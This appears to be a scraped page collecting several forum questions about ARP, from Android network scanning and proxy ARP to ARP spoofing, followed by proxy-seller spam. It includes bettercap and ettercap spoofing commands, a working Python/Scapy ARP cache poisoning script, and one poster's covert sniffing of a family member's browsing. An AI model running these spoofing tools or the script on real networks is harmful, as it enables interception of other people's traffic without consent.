networking – ARP information when targeting Android API 29+

I’m working on a project that scans for devices on a network. Up until recently, I have been sending requests to all possible addresses on the network and then reading /proc/net/arp for device information. As of API 29 access is denied from the application reading /proc/net/arp. Is there another way to receive this information from an Android application?

arp spoofing – Arp spoof with bettercap in internal network

Im using bettercap to assess my internal network, using bettercap/bettercap docker image on my mac.
My router ip us 192.168.0.254, and I have two connected objects who I try to spoof in order to monitor it using Wireshark.
the problem with my docker image doesn’t access my internal network, it always give me could not find spoof targets when executing this command

set arp.spoof.targets 192.168.0.100-101; arp.spoof on

The command net.show after executing net.probe on it gives me this result :

┌──────────────┬───────────────────┬──────┬────────┬───────┬────────┬──────────┐
│     IP ▴     │        MAC        │ Name │ Vendor │ Sent  │ Recvd  │   Seen   │
├──────────────┼───────────────────┼──────┼────────┼───────┼────────┼──────────┤
│ 192.168.65.3 │ 02:50:00:00:00:01 │ eth0 │        │ 0 B   │ 0 B    │ 08:07:35 │
│              │                   │      │        │       │        │          │
│ 192.168.65.1 │ f6:16:36:bc:f9:c6 │      │        │ 901 B │ 1.0 kB │ 08:08:57 │
└──────────────┴───────────────────┴──────┴────────┴───────┴────────┴──────────┘

I don’t know what to do. I just want to capture the commands sent from
the cloud servers to the IoT objects by arp spoofing.
Thank you?

ethernet – Why are ARP requests not being received by all hosts on other switches? (Ubiquiti switches)

ethernet – Why are ARP requests not being received by all hosts on other switches? (Ubiquiti switches) – Server Fault

linux networking – How can I set up a layer 3 bridge using Proxy ARP such that http requests can be made to the inside/proxied host’s IP successfully?

Currently I am using a Raspberry Pi to bridge an ethernet connected printer to wireless internet and have used DNAT successfully to give the printer internet access, manually forwarding the printer’s port 80 to the Rpi’s wlan0 interface port 80 along with other needed ports to access the printer using outside hosts. I’ve also been able to use Proxy ARP so that the printer’s static IP address is visible on the network, the Pi responding to ARP broadcasts on the printer’s behalf and proxying ARP requests for the printer. What I would like to do is combine the functionality of the DNAT approach with the IP separation provided by Proxy ARP.

The problem is that I cannot figure out how to seamlessly accomplish the needed forwarding/spoofing with the Rpi so that instead of directing requests to the Pi’s port 80, outside hosts can make requests using the printer’s IP directly even if it’s on a different subnet, say 10.1.2.254:80, to access the http page.

Is it possible to accomplish this routing in tandem with Proxy ARP? Are there other approaches that are better suited for this arrangement, or could IP aliases alongside DNAT accomplish this illusion that the printer’s IP and active ports are also present on the network/another network?

why is “arp -a” showing inconsistent outputs that are vastly different?

I have newly set up a computer with Ubuntu 18.04 and connected to my home wifi. When I try arp -a command to scan other devices connected to the same network, I see some very weird outputs.

First, the connect is fine by checking ifconfig:

john@home:~$ ifconfig 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 246054  bytes 21958490 (21.9 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 246054  bytes 21958490 (21.9 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

wlo1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.1.14  netmask 255.255.255.0  broadcast 192.168.1.255
        inet6 fe80::e3f:e0a5:2438:a96a  prefixlen 64  scopeid 0x20<link>
        inet6 240d:1a:6a5:c900:1420:b3cc:994b:1b7b  prefixlen 64  scopeid 0x0<global>
        inet6 240d:1a:6a5:c900:74f4:f504:3a41:bc12  prefixlen 64  scopeid 0x0<global>
        ether 04:33:c2:c4:02:a2  txqueuelen 1000  (Ethernet)
        RX packets 2452125  bytes 3302288691 (3.3 GB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 964749  bytes 117659686 (117.6 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

It has the ip address of 192.168.1.14
Then I tried arp -a:

john@home:~$ arp -a 
? (192.168.1.19) at 92:c4:78:3c:46:16 (ether) on wlo1
_gateway (192.168.1.1) at e4:7e:66:1f:bf:4c (ether) on wlo1
? (192.168.1.5) at 26:36:46:f9:69:83 (ether) on wlo1

which makes sense because I can confirm that my ipad has ip address of 192.168.1.19 and my phone has ip address of 192.168.1.5

However, after a while I executed arp -a again, and the output blows my mind:

john@home:~$ arp -a 
? (192.168.1.206) at <incomplete> on wlo1
? (192.168.1.183) at <incomplete> on wlo1
? (192.168.1.107) at <incomplete> on wlo1
? (192.168.1.8) at <incomplete> on wlo1
? (192.168.1.18) at <incomplete> on wlo1
? (192.168.1.165) at <incomplete> on wlo1
? (192.168.1.186) at <incomplete> on wlo1
? (192.168.1.110) at <incomplete> on wlo1
? (192.168.1.77) at <incomplete> on wlo1
? (192.168.1.33) at <incomplete> on wlo1
? (192.168.1.178) at <incomplete> on wlo1
? (192.168.1.123) at <incomplete> on wlo1
? (192.168.1.112) at <incomplete> on wlo1
? (192.168.1.96) at <incomplete> on wlo1
? (192.168.1.117) at <incomplete> on wlo1
? (192.168.1.74) at <incomplete> on wlo1
? (192.168.1.95) at <incomplete> on wlo1
? (192.168.1.84) at <incomplete> on wlo1
? (192.168.1.41) at <incomplete> on wlo1
? (192.168.1.62) at <incomplete> on wlo1
? (192.168.1.51) at <incomplete> on wlo1
? (192.168.1.8) at <incomplete> on wlo1
? (192.168.1.29) at <incomplete> on wlo1
? (192.168.1.18) at <incomplete> on wlo1
? (192.168.1.231) at <incomplete> on wlo1
? (192.168.1.252) at <incomplete> on wlo1
? (192.168.1.241) at <incomplete> on wlo1
? (192.168.1.198) at <incomplete> on wlo1
? (192.168.1.219) at <incomplete> on wlo1
? (192.168.1.208) at <incomplete> on wlo1
? (192.168.1.165) at <incomplete> on wlo1
? (192.168.1.186) at <incomplete> on wlo1
? (192.168.1.143) at <incomplete> on wlo1
? (192.168.1.132) at <incomplete> on wlo1
? (192.168.1.153) at <incomplete> on wlo1
? (192.168.1.110) at <incomplete> on wlo1
? (192.168.1.99) at <incomplete> on wlo1
? (192.168.1.120) at <incomplete> on wlo1
? (192.168.1.77) at <incomplete> on wlo1
? (192.168.1.66) at <incomplete> on wlo1
? (192.168.1.87) at <incomplete> on wlo1
? (192.168.1.44) at <incomplete> on wlo1
? (192.168.1.33) at <incomplete> on wlo1
? (192.168.1.54) at <incomplete> on wlo1
? (192.168.1.11) at <incomplete> on wlo1
? (192.168.1.21) at <incomplete> on wlo1
? (192.168.1.234) at <incomplete> on wlo1
? (192.168.1.244) at <incomplete> on wlo1
? (192.168.1.201) at <incomplete> on wlo1
? (192.168.1.222) at <incomplete> on wlo1
? (192.168.1.211) at <incomplete> on wlo1
? (192.168.1.168) at <incomplete> on wlo1
? (192.168.1.189) at <incomplete> on wlo1
? (192.168.1.178) at <incomplete> on wlo1
? (192.168.1.135) at <incomplete> on wlo1
? (192.168.1.156) at <incomplete> on wlo1
? (192.168.1.145) at <incomplete> on wlo1
? (192.168.1.102) at <incomplete> on wlo1
? (192.168.1.123) at <incomplete> on wlo1
? (192.168.1.112) at <incomplete> on wlo1
? (192.168.1.69) at <incomplete> on wlo1
? (192.168.1.90) at <incomplete> on wlo1
? (192.168.1.47) at <incomplete> on wlo1
? (192.168.1.36) at <incomplete> on wlo1
? (192.168.1.57) at <incomplete> on wlo1
? (192.168.1.3) at <incomplete> on wlo1
? (192.168.1.24) at <incomplete> on wlo1
? (192.168.1.237) at <incomplete> on wlo1
? (192.168.1.226) at <incomplete> on wlo1
? (192.168.1.247) at <incomplete> on wlo1
? (192.168.1.204) at <incomplete> on wlo1
? (192.168.1.193) at <incomplete> on wlo1
? (192.168.1.214) at <incomplete> on wlo1
? (192.168.1.171) at <incomplete> on wlo1
? (192.168.1.160) at <incomplete> on wlo1
? (192.168.1.181) at <incomplete> on wlo1
? (192.168.1.138) at <incomplete> on wlo1
? (192.168.1.159) at <incomplete> on wlo1
? (192.168.1.148) at <incomplete> on wlo1
? (192.168.1.105) at <incomplete> on wlo1
? (192.168.1.126) at <incomplete> on wlo1
? (192.168.1.115) at <incomplete> on wlo1
? (192.168.1.72) at <incomplete> on wlo1
? (192.168.1.93) at <incomplete> on wlo1
? (192.168.1.82) at <incomplete> on wlo1
? (192.168.1.39) at <incomplete> on wlo1
? (192.168.1.60) at <incomplete> on wlo1
? (192.168.1.49) at <incomplete> on wlo1
? (192.168.1.6) at <incomplete> on wlo1
? (192.168.1.27) at <incomplete> on wlo1
? (192.168.1.16) at <incomplete> on wlo1
? (192.168.1.229) at <incomplete> on wlo1
? (192.168.1.250) at <incomplete> on wlo1
? (192.168.1.207) at <incomplete> on wlo1
? (192.168.1.196) at <incomplete> on wlo1
? (192.168.1.217) at <incomplete> on wlo1
? (192.168.1.174) at <incomplete> on wlo1
? (192.168.1.163) at <incomplete> on wlo1
? (192.168.1.184) at <incomplete> on wlo1
? (192.168.1.141) at <incomplete> on wlo1
? (192.168.1.130) at <incomplete> on wlo1
? (192.168.1.151) at <incomplete> on wlo1
? (192.168.1.108) at <incomplete> on wlo1
? (192.168.1.97) at <incomplete> on wlo1
? (192.168.1.118) at <incomplete> on wlo1
? (192.168.1.75) at <incomplete> on wlo1
? (192.168.1.64) at <incomplete> on wlo1
? (192.168.1.85) at <incomplete> on wlo1
? (192.168.1.42) at <incomplete> on wlo1
? (192.168.1.63) at <incomplete> on wlo1
? (192.168.1.52) at <incomplete> on wlo1
? (192.168.1.9) at <incomplete> on wlo1
? (192.168.1.30) at <incomplete> on wlo1
? (192.168.1.19) at <incomplete> on wlo1
? (192.168.1.232) at <incomplete> on wlo1
? (192.168.1.253) at <incomplete> on wlo1
? (192.168.1.242) at <incomplete> on wlo1
? (192.168.1.199) at <incomplete> on wlo1
? (192.168.1.220) at <incomplete> on wlo1
? (192.168.1.209) at <incomplete> on wlo1
? (192.168.1.166) at <incomplete> on wlo1
? (192.168.1.187) at <incomplete> on wlo1
? (192.168.1.176) at <incomplete> on wlo1
? (192.168.1.133) at <incomplete> on wlo1
? (192.168.1.154) at <incomplete> on wlo1
? (192.168.1.111) at <incomplete> on wlo1
? (192.168.1.100) at <incomplete> on wlo1
? (192.168.1.121) at <incomplete> on wlo1
? (192.168.1.78) at <incomplete> on wlo1
? (192.168.1.67) at <incomplete> on wlo1
? (192.168.1.88) at <incomplete> on wlo1
? (192.168.1.45) at <incomplete> on wlo1
? (192.168.1.34) at <incomplete> on wlo1
? (192.168.1.55) at <incomplete> on wlo1
? (192.168.1.12) at <incomplete> on wlo1
_gateway (192.168.1.1) at e4:7e:66:1f:bf:4c (ether) on wlo1
? (192.168.1.22) at <incomplete> on wlo1
? (192.168.1.235) at <incomplete> on wlo1
? (192.168.1.224) at <incomplete> on wlo1
? (192.168.1.245) at <incomplete> on wlo1
? (192.168.1.202) at <incomplete> on wlo1
? (192.168.1.223) at <incomplete> on wlo1
? (192.168.1.212) at <incomplete> on wlo1
? (192.168.1.169) at <incomplete> on wlo1
? (192.168.1.190) at <incomplete> on wlo1
? (192.168.1.179) at <incomplete> on wlo1
? (192.168.1.136) at <incomplete> on wlo1
? (192.168.1.157) at <incomplete> on wlo1
? (192.168.1.146) at <incomplete> on wlo1
? (192.168.1.103) at <incomplete> on wlo1
? (192.168.1.124) at <incomplete> on wlo1
? (192.168.1.113) at <incomplete> on wlo1
? (192.168.1.70) at <incomplete> on wlo1
? (192.168.1.91) at <incomplete> on wlo1
? (192.168.1.80) at <incomplete> on wlo1
? (192.168.1.37) at <incomplete> on wlo1
? (192.168.1.58) at <incomplete> on wlo1
? (192.168.1.15) at <incomplete> on wlo1
? (192.168.1.4) at <incomplete> on wlo1
? (192.168.1.25) at <incomplete> on wlo1
? (192.168.1.238) at <incomplete> on wlo1
? (192.168.1.227) at <incomplete> on wlo1
? (192.168.1.248) at <incomplete> on wlo1
? (192.168.1.205) at <incomplete> on wlo1
? (192.168.1.194) at <incomplete> on wlo1
? (192.168.1.215) at <incomplete> on wlo1
? (192.168.1.172) at <incomplete> on wlo1
? (192.168.1.161) at <incomplete> on wlo1
? (192.168.1.182) at <incomplete> on wlo1
? (192.168.1.139) at <incomplete> on wlo1
? (192.168.1.128) at <incomplete> on wlo1
? (192.168.1.149) at <incomplete> on wlo1
? (192.168.1.106) at <incomplete> on wlo1
? (192.168.1.127) at <incomplete> on wlo1
? (192.168.1.116) at <incomplete> on wlo1
? (192.168.1.73) at <incomplete> on wlo1
? (192.168.1.94) at <incomplete> on wlo1
? (192.168.1.83) at <incomplete> on wlo1
? (192.168.1.40) at <incomplete> on wlo1
? (192.168.1.61) at <incomplete> on wlo1
? (192.168.1.50) at <incomplete> on wlo1
? (192.168.1.7) at <incomplete> on wlo1
? (192.168.1.28) at <incomplete> on wlo1
? (192.168.1.17) at <incomplete> on wlo1
? (192.168.1.230) at <incomplete> on wlo1
? (192.168.1.251) at <incomplete> on wlo1
? (192.168.1.240) at <incomplete> on wlo1
? (192.168.1.197) at <incomplete> on wlo1
? (192.168.1.218) at <incomplete> on wlo1
? (192.168.1.175) at <incomplete> on wlo1
? (192.168.1.164) at <incomplete> on wlo1
? (192.168.1.185) at <incomplete> on wlo1
? (192.168.1.142) at <incomplete> on wlo1
? (192.168.1.131) at <incomplete> on wlo1
? (192.168.1.152) at <incomplete> on wlo1
? (192.168.1.109) at <incomplete> on wlo1
? (192.168.1.98) at <incomplete> on wlo1
? (192.168.1.119) at <incomplete> on wlo1
? (192.168.1.76) at <incomplete> on wlo1
? (192.168.1.65) at <incomplete> on wlo1
? (192.168.1.86) at <incomplete> on wlo1
? (192.168.1.43) at <incomplete> on wlo1
? (192.168.1.32) at <incomplete> on wlo1
? (192.168.1.53) at <incomplete> on wlo1
? (192.168.1.10) at <incomplete> on wlo1
? (192.168.1.31) at <incomplete> on wlo1
? (192.168.1.20) at <incomplete> on wlo1
? (192.168.1.233) at <incomplete> on wlo1
? (192.168.1.254) at <incomplete> on wlo1
? (192.168.1.243) at <incomplete> on wlo1
? (192.168.1.200) at <incomplete> on wlo1
? (192.168.1.221) at <incomplete> on wlo1
john@home:~$ 

What is this? What just happened?
I thought arp -a is supposed to scan and list other devices on the same network. What are these results?

Does ARP spoofing work on android?

I learnt about ARP spoofing technique and just tried it on my Windows 10 virtual machine. When I tried ARP spoofing on my virtual machine which is connected to the same NAT network as my kali machine, everything goes fine.

But, when I tried the same ARP spoofing on my Android phone, it didn’t work. While trying to figure out this issue, I came to know that some devices have ARP spoofing protection mechanisms.

Do all modern mobile phones have ARP spoofing protection?
Do routers also have this ARP spoofing protection?

Need help understand ARP spoofing attack?

I am currently reading the network exploitation section of the book Hacking: The art of exploitation. The book covers ARP spoofing attack in brief, but doesn’t go over much detail.

Before starting I would like to tell what kind of system/peripherals I would be using.

  • I use a System that accesses internet via Ethernet Cable. i.e. I don’t have a router, due to which I directly connect the ethernet cable to my pc (PPPOE)
  • That cable goes to the electric pole, where it is connected to a switch. That switch also acts as an endpoint for other users like me as well
  • A lot of these switches are interconnected with one another

I do have a fundamental understanding of the attack (rectify if wrong), which in brief goes as follows:-

  • Run ARP protocol to get MAC addresses of all the live hosts in the local network

  • Poison the ARP cache of hosts by sending them ARP responses (on regular interval) stating that the IP address of another system is at our mac address

  • This will make them send packets which would have our MAC address in the Data-Link layer, and would reach us

I have many doubts (some regarding the above process, others are conceptual)!!

  1. In order to execute the attack we needs to have IP address of other local hosts. Which I just can’t seem to have.

    • I ran a Windows machine and tried using Advanced IP scanner, but ended up getting IP addresses associated to my pc (VM, Ethernet, Default Gateway).
    • Tried arp -a command, ended up getting a huge list of IP addresses of which 99% were static, few were dynamic. Some of them had MAC address entries, on others which was blank.

    So, How am I supposed to get the IP addresses of other hosts?

  2. The book mentions default gateways as a target. So what exactly is a default gateways (for my setup), And how does it work?

  3. Since we can poison the ARP cache to add entries to it, Is it (asking from a security perspective) possible to create entries to addresses that aren’t local!! For Example. Let’s say we have the IP address of 192.168.1.12 having mac 00:00:00:01, and a Facebook server has IP address 10.0.0.23. Is it possible to send a ARP response i.e. it will poison the ARP cache of a local user to make it seem like the address 10.0.0.23 is at mac address 00:00:00:01. Then would the packet sent over to the Facebook IP be delivered over to us? Or would it be filtered by the router?

  4. What is the address of the first node (to me) where my data is sent over to? Like for most users it would be their router (at a basic level), but since I don’t use one, what would be the first node through which my data goes?

P.S.:- Initially I posted this question on network engineering, but it got closed over there as they thought I am trying to hack a network. Firstly, I am using the above test in a controlled environment. Secondly, the questions are related to a lot more to securing stuff then to exploiting them. All I am trying to do is get a understanding about the underlying protocols.

man in the middle – Arp spoofing inside Docker containers disables network on a victim container

I’m trying to create a lab environment to experiment with MiTM attacks. I want to learn docker also so I’ve decided to do this with docker. I created 2 images (attacker, victim):

Victim – based on Alpine, with curl installed
Attacker – based on Ubuntu, with installed iputils-ping iproute2 curl iptables vim ettercap-text-only dsniff and tshark.

They’re both in bridged network, so the router here would be docker0 interface (default: 172.17.0.1)

I’m running the attacker container with –privileged flag, to enable using ettercap.

So when both images is running I’m executing ettercap from attacker container with:

ettercap -T -o -S -i eth0 -M arp:remote //victim_ip/ //172.17.0.1/

And the network of victim container is loosing connection. I’m trying to ping google.com, but with no effect. The MiTM attack is working because I can see this traffic on victim containers but something is blocking it.

enter image description here

I’ve tried with arpspoof tool too, but with the same effect.

Tried also
echo 1 > /proc/sys/net/ipv4/ip_forward

I’ve checked it on host machine with wireshark and that’s what I see…
enter image description here

I’m not pro with wireshark and ettercap and docker so, maybe I assumed wrong that I can consider docker0 as a normal router that can be fooled with arpsoofing attack.

When I disable ettercap, the network connection is back again.

Any hint what may be wrong will be helpful.

man in the middle – At times bettercap ARP sniffing works great and at times not at all, what would be the reason?

I like to track the websites my daughter goes to in order to have some control. So I installed bettercap and setup a script to start it to sniff the HTML URLs being accessed (well, the reverse URL from the IP really).

sudo bettercap --eval 'set events.stream.time.format 2006-01-02 15:04:05;
                       set arp.spoof.targets 192.168.n.m;
                       arp.spoof on;
                       net.sniff on'

Note: the command is a single line (no new-line), I added new lines here for clarity.

The result is a large list of URLs as she hits one website or another. Especially, I see a ton of marketing websites (darn!). But at times I just see the messages:

endpoint detected as

and

end point lost

(the messages include the IP address and device name, in general).

So even though the end points are properly detected, no other data comes through.

My network looks more or less like this:

+--------+   +-------+
| Laptop |   | Phone |
+---+----+   +---+---+
    |            |
    |            |
    |            v
    |      +----------+
    +----->| WiFi Hub |
           +-----+----+
                 |            +-------------------+
                 |            | Main Server       |
                 v            |                   |
           +----------+       |   +-------------+ |
           | Switch   |<------+   | Kali Linux  | |
           +----------+       |   | (bettercap) | |
                 ^            |   | VPS         | |       +--------+
                 |            |   +-------------+ +------>| Router +----> Internet
                 |            |                   |       +--------+
                 |            +-------------------+
           +-----+-----+
           | Laptop    |
           | (Wired)   |
           +-----------+

So all the traffic from all the machines do go through the Main Server using the FORWARD capability of the Linux firewall. In other words the computers to the left are all isolated (they can still communicate between each others but not directly to the main server, the main server can connect to some of them, though). So the network is rather secure.

Since it worked before I would imagine that the script is correct, but still, there is something that makes Kali bettercap work or fail just like that. I’m not too sure what I would need to do to make it work every time I reboot without having to fiddle with it (although this time the fiddling didn’t help, it’s still not tracking anything).

python – ARP Poisoning slows down victim’s internet connection

I’m trying to code an ARP cache poisoning program in Python (for learning purposes), using Scapy.

My program does the following steps:

  • scans all of the devices on the LAN (using ARP Ping packets).
  • Lets the user to choose an IP to attack, and then poisoning the ARP cache of the router and the victim, using fake ARP packets in Scapy.

In addition, I’ve enabled IP Forwarding in order to keep, the connection between the victim and the router, working properly.

My problem is whenever I use this code on a victim in my LAN, it really slows down the victim’s internet connection and sometimes even stops his internet connection.

Here is my code:

from scapy.all import *
import threading

MY_IP = get_if_addr(conf.iface)
MY_MAC = get_if_hwaddr(conf.iface)
GATEWAY_IP = conf.route.route("0.0.0.0")(2)

def gateway_mac():
    print("(*) Gathering Default Gateway's IP...")
    arp = ARP(op=1, pdst = GATEWAY_IP)
    response = sr1(arp)
    return response.hwsrc

GATEWAY_MAC = gateway_mac()

def Scan():
    output = arping("10.0.0.0/24")
    file = open("ip_list.txt", 'w')
    txt = ""
    for i in output(0):
        txt += i(1).psrc + ';' + i(1).hwsrc + "n"
    file.write(txt)
    file.close()

def poison(victim_ip, victim_mac):
    print("(*) Poisoning...")
    victimToRouter = ARP(op=2, psrc=GATEWAY_IP, pdst=victim_ip, hwsrc=MY_MAC, hwdst=victim_mac)
    routerToVictim = ARP(op=2, hwdst=GATEWAY_MAC, hwsrc=MY_MAC, pdst=GATEWAY_IP, psrc=victim_ip)
    forward = threading.Thread(target=forward_packets, args=(victim_ip, victim_mac))
    forward.start()
    while True:
        try:
            send(victimToRouter)
            send(routerToVictim)
            time.sleep(5)
        except KeyboardInterrupt:
            restore(victim_ip, victim_mac)
            break

def restore(victim_ip, victim_mac):
    victimToRouter = ARP(op=2, psrc=GATEWAY_IP, pdst=victim_ip, hwsrc=GATEWAY_MAC, hwdst=victim_mac)
    routerToVictim = ARP(op=2, psrc=victim_ip, pdst=GATEWAY_IP, hwsrc=victim_mac, hwdst=GATEWAY_MAC)
    send(victimToRouter)
    send(routerToVictim)

def main():
    print("(*) Scanning for devices in the LAN...")
    ScanDevices.Scan()

    file = open("ip_list.txt", 'r')
    ip_list = file.read().split()
    print("(?) Please choose a number from the list below, in order to choose an IP address to poison:")
    for i in range(len(ip_list)):
        ip_list(i) = ip_list(i).split(';')
        print(str(i) + ") " + str(ip_list(i)(0)))

    try:
        user_input = int(input())
        poison(ip_list(user_input)(0), ip_list(user_input)(1))
    except:
        print("(!) Invalid input!")

if __name__ == '__main__':
    main()

Thanks in advance!

DreamProxies - Cheapest USA Elite Private Proxies 100 Private Proxies 200 Private Proxies 400 Private Proxies 1000 Private Proxies 2000 Private Proxies ExtraProxies.com - Buy Cheap Private Proxies Buy 50 Private Proxies Buy 100 Private Proxies Buy 200 Private Proxies Buy 500 Private Proxies Buy 1000 Private Proxies Buy 2000 Private Proxies ProxiesLive Proxies-free.com New Proxy Lists Every Day Proxies123